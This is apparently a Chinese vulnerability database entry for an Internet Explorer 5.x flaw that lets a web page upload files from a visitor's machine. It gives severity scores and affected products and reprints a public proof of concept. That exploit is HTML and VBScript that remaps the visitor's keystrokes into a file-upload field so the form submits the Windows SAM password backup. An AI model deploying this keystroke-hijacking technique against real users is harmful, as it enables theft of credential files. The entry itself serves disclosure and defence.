发布时间 :2001-02-16 00:00:00
修订时间 :2008-09-05 16:23:14

[原文]Internet Explorer 5.0 through 5.5 allows remote attackers to read arbitrary files from the client via the INPUT TYPE element in an HTML form, aka the "File Upload via Form" vulnerability.

[CNNVD]Internet Explorer漏洞(CNNVD-200102-105)

        Internet Explorer 5.0到5.5版本存在漏洞。远程攻击者借助HTML表单的INPUT TYPE元素读取来自客户端的任意文件,也称为“借助表单的文件上传”漏洞。

- CVSS (基础分值)

CVSS分值: 2.6 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:ie:5.5Microsoft ie 5.5
cpe:/a:microsoft:ie:5.0Microsoft Internet Explorer 5.0
cpe:/a:microsoft:ie:5.01Microsoft Internet Explorer 5.01

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  XF  ie-form-file-upload

- 漏洞信息

Internet Explorer漏洞
低危 未知
2001-02-16 00:00:00 2005-10-12 00:00:00
        Internet Explorer 5.0到5.5版本存在漏洞。远程攻击者借助HTML表单的INPUT TYPE元素读取来自客户端的任意文件,也称为“借助表单的文件上传”漏洞。

- 公告与补丁


- 漏洞信息 (20459)

Microsoft Internet Explorer 5 \'INPUT TYPE=FILE\' Vulnerability (EDBID:20459)
windows remote
2000-12-01 Verified
0 Key
N/A [点击下载]

One of the ways users submit information to remote websites is through the INPUT type form options. Users can upload files to remote webservers with the input type=FILE option.

Due to a design error in the implementation of the INPUT TYPE=FILE variable , it is possible for a website operator to specify a known filename from the visitors machine for upload to the website.

This vulnerability is exploitable under certain circumstances, the filename would have to be known by the website operator, the amount of characters that exist in the filename would have to be the same amount of characters the user typed in the form, and the visiting user would need to have at least read access to the known file. This vulnerability does not allow the website operator to delete or modify any files on the visitors machine.

Successful exploitation of this vulnerability could lead to the disclosure of sensitive information and possibly assist in further attacks against the victim. 

<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<form action="../get_file.asp" method="POST" enctype="multipart/form-data" id=form1 name=form1>
<table width="400" align="center" border="0" cellpadding="0" cellspacing="0">
<tr><td colspan="2" align="right"></td></tr>
<tr><td bgcolor="000080" width="480">
<font size="3" color="white"><b>&nbsp;Example.. IE 5 Version</b></font></td><td align="right" bgcolor="FFFFFF">

<table border="0" width="400" cellspacing="1" cellpadding="2" bgcolor="#000000" align="center">
    <td colspan="2" bgcolor="white" align="left"><font face="Verdana" size="2"><b>Text:</b></font>
    <input type="text" name="userInput" size="31" maxlength="" onKeyPress="myFuncFirst()"></td>
    <td colspan="2" bgcolor="white" align="left"><font face="Verdana" size="2"><b>File:</b></font>
    <input type="File" name="file" size="31" onFocus="myFocus()" size=0></td>
    <td width="60%">&nbsp;</td>
    <td width="40%" bgcolor="#FFFFFF" align="right"><input type="submit" id="submit1" name="submit1" value="Post">&nbsp;&nbsp;<input type="reset" value="Reset" id="reset1" name="reset1">
    <input type="hidden" name="doit" value="1">
<script language="VBScript">
'A lot of this is pretty, I don't have much time for this kind of stuff.
'Make changes as you wish, but be sure to include me (key) in your version.

'Declare stuff
Dim userKey
Dim charCount
Dim getFile
Dim myArray

'c  :  \  w  i  n  n  t  \  r  e  p  a  i  r  \  s  a  m  .  _

'Has to be backwards, that's the order I push it into the File field.
'_  .  m  a  s  \  r  i  a  p  e  r  \  t  n  n  i  w  \  :  c

'Set getFile with the correct keycodes
getFile = "95|46|77|65|83|47|82|73|65|80|69|82|47|84|78|78|73|87|47|58|67"

'ReDim myArray to correct UBound
ReDim myArray(Len(getFile)/3)

'Index of array to use
charCount = 0

'Set myArray with a split version of getfile
myArray = split(getFile, "|")

'This is activated anytime
Sub myFocus()
	document.form1.userInput.innerText = document.form1.userInput.value
End Sub

'This is activated with the onKeyPress event of userInput
Sub myFuncFirst()
	If charCount < (Len(getFile)/3) Then
		'Find the key the user pressed
		userKey = chr(window.event.keyCode)
		'Change that key to the keycode we want
		window.event.keyCode = cint(myArray(charCount))
		'Set focus to form1.file so that our key gets sent to it
		'Increment charCount to the next char we want
		charCount = charCount + 1
		'Make userInput reflect the user's change
		document.form1.userInput.innerText = document.form1.userInput.value + userKey
	end if
End Sub



- 漏洞信息

Microsoft IE HTML Form Input Element Arbitrary File Access
Context Dependent Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

- 时间线

2000-12-01 Unknow
2000-12-01 Unknow

- 解决方案


Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete